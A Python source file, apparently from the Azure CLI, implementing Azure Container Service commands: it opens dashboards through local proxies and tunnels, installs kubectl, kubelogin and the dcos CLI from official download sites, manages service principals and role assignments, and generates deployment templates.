from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import CONST_OPEN_SERVICE_MESH_ADDON_NAME
from ._consts import (CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME,
CONST_SECRET_ROTATION_ENABLED,
CONST_ROTATION_POLL_INTERVAL)
from ._consts import ADDONS
from ._consts import CONST_CANIPULL_IMAGE
from ._consts import CONST_MANAGED_IDENTITY_OPERATOR_ROLE, CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID
from ._consts import DecoratorEarlyExitException
from .addonconfiguration import (
add_monitoring_role_assignment,
add_ingress_appgw_addon_role_assignment,
add_virtual_node_role_assignment,
ensure_default_log_analytics_workspace_for_monitoring,
ensure_container_insights_for_monitoring,
)
from ._resourcegroup import get_rg_location
from ._validators import extract_comma_separated_string
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def get_cmd_test_hook_data(filename):
hook_data = None
curr_dir = os.path.dirname(os.path.realpath(__file__))
test_hook_file_path = os.path.join(curr_dir, 'tests/latest/data', filename)
if os.path.exists(test_hook_file_path):
with open(test_hook_file_path, "r") as f:
hook_data = json.load(f)
return hook_data
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(
cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError(
'Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(
name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(
_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError(
'Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def _unzip(src, dest):
logger.debug('Extracting %s to %s.', src, dest)
system = platform.system()
if system in ('Linux', 'Darwin', 'Windows'):
with zipfile.ZipFile(src, 'r') as zipObj:
zipObj.extractall(dest)
else:
raise CLIError('The current system is not supported.')
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError(
'Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None, base_src_url=None,
kubelogin_version='latest', kubelogin_install_location=None,
kubelogin_base_src_url=None):
k8s_install_kubectl(cmd, client_version, install_location, base_src_url)
k8s_install_kubelogin(cmd, kubelogin_version,
kubelogin_install_location, kubelogin_base_src_url)
def k8s_install_kubectl(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubectl, a command-line interface for Kubernetes clusters.
"""
if not source_url:
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to "%s" from "%s"',
install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.
"""
cloud_name = cmd.cli_ctx.cloud.name
if not source_url:
source_url = 'https://github.com/Azure/kubelogin/releases/download'
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
if client_version == 'latest':
context = _ssl_context()
latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
if cloud_name.lower() == 'azurechinacloud':
latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
latest_release = urlopen(latest_release_url, context=context).read()
client_version = json.loads(latest_release)['tag_name'].strip()
else:
client_version = "v%s" % client_version
base_url = source_url + '/{}/kubelogin.zip'
file_url = base_url.format(client_version)
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
system = platform.system()
if system == 'Windows':
sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
elif system == 'Linux':
# TODO: Support ARM CPU here
sub_dir, binary_name = 'linux_amd64', 'kubelogin'
elif system == 'Darwin':
if platform.machine() == 'arm64':
sub_dir, binary_name = 'darwin_arm64', 'kubelogin'
else:
sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
with tempfile.TemporaryDirectory() as tmp_dir:
try:
download_path = os.path.join(tmp_dir, 'kubelogin.zip')
logger.warning('Downloading client to "%s" from "%s"',
download_path, file_url)
_urlretrieve(file_url, download_path)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
_unzip(download_path, tmp_dir)
download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
shutil.move(download_path, install_location)
os.chmod(install_location, os.stat(install_location).st_mode |
stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
def _add_role_assignment(cmd, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cmd.cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate',
value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate',
value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(
cmd, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except CLIError as ex:
logger.warning(str(ex))
except Exception as ex: # pylint: disable=broad-except
logger.error(str(ex))
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None, is_service_principal=True):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False, is_service_principal=is_service_principal)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None, is_service_principal=True):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope,
is_service_principal=is_service_principal)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups,
is_service_principal=True):
assignee_object_id = None
if assignee:
if is_service_principal:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
else:
assignee_object_id = assignee
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(
default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(
default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict(
{"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(
_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
:param admin_password: The adminstration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(
windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
DeploymentProperties = cmd.get_models(
'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
Deployment = cmd.get_models(
'Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
